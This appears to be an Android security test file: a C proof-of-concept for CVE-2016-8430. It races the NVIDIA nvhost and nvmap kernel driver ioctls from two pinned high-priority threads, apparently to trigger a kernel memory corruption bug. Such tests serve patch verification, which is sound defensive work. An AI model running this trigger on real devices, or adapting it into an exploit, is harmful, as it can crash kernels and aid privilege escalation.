Home | History | Annotate | Download | only in CVE-2016-8430 
      1 /*
      2  * Copyright (C) 2016 The Android Open Source Project
      3  *
      4  * Licensed under the Apache License, Version 2.0 (the "License");
      5  * you may not use this file except in compliance with the License.
      6  * You may obtain a copy of the License at
      7  *
      8  *      http://www.apache.org/licenses/LICENSE-2.0
      9  *
     10  * Unless required by applicable law or agreed to in writing, software
     11  * distributed under the License is distributed on an "AS IS" BASIS,
     12  * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
     13  * See the License for the specific language governing permissions and
     14  * limitations under the License.
     15  */
     16 #define _GNU_SOURCE
     17 
     18 #include <errno.h>
     19 #include <unistd.h>
     20 #include <stdio.h>
     21 #include <dirent.h>
     22 #include <string.h>
     23 #include <sys/stat.h>
     24 #include <sys/ioctl.h>
     25 #include <stdio.h>
     26 #include <string.h>
     27 #include <dlfcn.h>
     28 #include <sys/time.h>
     29 #include <sys/mman.h>
     30 #include <sys/syscall.h>
     31 #include <sys/resource.h>
     32 #include <fcntl.h>
     33 #include <pthread.h>
     34 #include <unistd.h>
     35 #include <sched.h>
     36 #include <stdlib.h>
     37 
     38 struct nvhost_channel_open_args {
     39 	__s32 channel_fd;
     40 };
     41 struct nvhost_set_error_notifier {
     42 	__u64 offset;
     43 	__u64 size;
     44 	__u32 mem;
     45 	__u32 padding;
     46 };
     47 #define NVHOST_IOCTL_MAGIC 'H'
     48 #define NVHOST_IOCTL_CHANNEL_OPEN	\
     49 	_IOR(NVHOST_IOCTL_MAGIC,  112, struct nvhost_channel_open_args)
     50 #define NVHOST_IOCTL_CHANNEL_SET_ERROR_NOTIFIER  \
     51 	_IOWR(NVHOST_IOCTL_MAGIC, 111, struct nvhost_set_error_notifier)
     52 struct nvmap_create_handle {
     53 	union {
     54 		__u32 id;	/* FromId */
     55 		__u32 size;	/* CreateHandle */
     56 		__s32 fd;	/* DmaBufFd or FromFd */
     57 	};
     58 	__u32 handle;		/* returns nvmap handle */
     59 };
     60 struct nvmap_alloc_handle {
     61 	__u32 handle;		/* nvmap handle */
     62 	__u32 heap_mask;	/* heaps to allocate from */
     63 	__u32 flags;		/* wb/wc/uc/iwb etc. */
     64 	__u32 align;		/* min alignment necessary */
     65 };
     66 #define NVMAP_HEAP_CARVEOUT_IRAM    (1ul<<29)
     67 #define NVMAP_HEAP_CARVEOUT_VPR     (1ul<<28)
     68 #define NVMAP_HEAP_CARVEOUT_TSEC    (1ul<<27)
     69 #define NVMAP_HEAP_CARVEOUT_GENERIC (1ul<<0)
     70 
     71 #define NVMAP_HEAP_CARVEOUT_MASK    (NVMAP_HEAP_IOVMM - 1)
     72 
     73 /* allocation flags */
     74 #define NVMAP_HANDLE_UNCACHEABLE     (0x0ul << 0)
     75 #define NVMAP_HANDLE_WRITE_COMBINE   (0x1ul << 0)
     76 #define NVMAP_HANDLE_INNER_CACHEABLE (0x2ul << 0)
     77 #define NVMAP_HANDLE_CACHEABLE       (0x3ul << 0)
     78 #define NVMAP_HANDLE_CACHE_FLAG      (0x3ul << 0)
     79 
     80 #define NVMAP_HANDLE_SECURE          (0x1ul << 2)
     81 #define NVMAP_HANDLE_KIND_SPECIFIED  (0x1ul << 3)
     82 #define NVMAP_HANDLE_COMPR_SPECIFIED (0x1ul << 4)
     83 #define NVMAP_HANDLE_ZEROED_PAGES    (0x1ul << 5)
     84 #define NVMAP_HANDLE_PHYS_CONTIG     (0x1ul << 6)
     85 #define NVMAP_HANDLE_CACHE_SYNC      (0x1ul << 7)
     86 #define NVMAP_IOC_MAGIC 'N'
     87 
     88 /* Creates a new memory handle. On input, the argument is the size of the new
     89  * handle; on return, the argument is the name of the new handle
     90  */
     91  #define NVMAP_IOC_ALLOC    _IOW(NVMAP_IOC_MAGIC, 3, struct nvmap_alloc_handle)
     92 #define NVMAP_IOC_CREATE  _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)
     93 #define NVMAP_IOC_FREE       _IO(NVMAP_IOC_MAGIC, 4)
     94 int g_fd = -1;
     95 int g_nvmap_fd = -1;
     96 static pthread_cond_t cond = PTHREAD_COND_INITIALIZER;
     97 static pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
     98 int g_channel_fd = -1;
     99 struct nvhost_set_error_notifier g_error_notifier;
    100 struct nvmap_create_handle g_nvmap_hdl;
    101 
    102 struct nvmap_alloc_handle g_real_alloc = {0};
    103 
    104 int open_driver() {
    105     char* dev_path = "/dev/nvhost-vic";
    106     g_fd = open(dev_path, O_RDONLY);
    107     if (g_fd < 0) {
    108         printf("open file(%s) failed, errno=%d\n", dev_path, errno);
    109         return -1;
    110     } else {
    111         printf("open file(%s) succ!\n", dev_path);
    112     }
    113 
    114     dev_path = "/dev/nvmap";
    115     g_nvmap_fd = open(dev_path, O_RDONLY);
    116     if (g_nvmap_fd < 0) {
    117         printf("open file(%s) failed, errno=%d\n", dev_path, errno);
    118         return -1;
    119     } else {
    120         printf("open file(%s) succ!\n", dev_path);
    121     }
    122     return 1;
    123 }
    124 
    125 void trigger_channel_open() {
    126     struct nvhost_channel_open_args args = {-1};
    127     ioctl(g_fd, NVHOST_IOCTL_CHANNEL_OPEN, &args);
    128     g_channel_fd = args.channel_fd;
    129 }
    130 
    131 int trigger_nvmap_create() {
    132     g_nvmap_hdl.size = 0x1000;
    133     ioctl(g_nvmap_fd, NVMAP_IOC_CREATE, &g_nvmap_hdl);
    134     return g_nvmap_hdl.handle;
    135 }
    136 
    137 void trigger_nvmap_free() {
    138     int data = g_nvmap_hdl.handle;
    139     ioctl(g_nvmap_fd, NVMAP_IOC_FREE, data);
    140 }
    141 void trigger_nvmap_alloc(int handle) {
    142     g_real_alloc.align = 0x1000;
    143     g_real_alloc.heap_mask = NVMAP_HEAP_CARVEOUT_GENERIC;
    144     g_real_alloc.flags = NVMAP_HANDLE_ZEROED_PAGES;
    145     g_real_alloc.handle = handle;
    146     ioctl(g_nvmap_fd, NVMAP_IOC_ALLOC, &g_real_alloc);
    147 }
    148 void prepare_data() {
    149     g_error_notifier.offset = 0;
    150     g_error_notifier.mem = g_nvmap_hdl.handle;
    151 }
    152 
    153 void trigger_set_error_notifier() {
    154     ioctl(g_fd, NVHOST_IOCTL_CHANNEL_SET_ERROR_NOTIFIER, &g_error_notifier);
    155 }
    156 
    157 void setup_privi_and_affinity(int privi, unsigned long cpu_mask) {
    158     setpriority(PRIO_PROCESS, gettid(), privi);
    159 
    160     /* bind process to a CPU*/
    161     if (sched_setaffinity(gettid(), sizeof(cpu_mask), &cpu_mask) < 0) {
    162     }
    163 }
    164 
    165 void* race_thread(void* arg) {
    166     setup_privi_and_affinity(-19, 2);
    167     pthread_mutex_lock(&mutex);
    168     pthread_cond_wait(&cond, &mutex);
    169     pthread_mutex_unlock(&mutex);
    170     while (1) {
    171         trigger_set_error_notifier();
    172     }
    173     return NULL;
    174 }
    175 
    176 void* race_thread_2(void* arg) {
    177     setup_privi_and_affinity(-19, 1);
    178     pthread_mutex_lock(&mutex);
    179     pthread_cond_wait(&cond, &mutex);
    180     pthread_mutex_unlock(&mutex);
    181     while (1) {
    182         trigger_set_error_notifier();
    183     }
    184     return NULL;
    185 }
    186 
    187 int main(int argc, char**argv) {
    188     setup_privi_and_affinity(0, 1);
    189     if (open_driver() < 0) {
    190         return -1;
    191     }
    192     //trigger_nvmap_create();
    193     trigger_nvmap_alloc(trigger_nvmap_create());
    194     prepare_data();
    195     //trigger_nvmap_free();
    196     pthread_t tid;
    197     pthread_create(&tid, NULL, race_thread, NULL);
    198     pthread_create(&tid, NULL, race_thread_2, NULL);
    199     usleep(100 * 1000);
    200     pthread_cond_broadcast(&cond);
    201 
    202     sleep(100);
    203     return 0;
    204 }
    205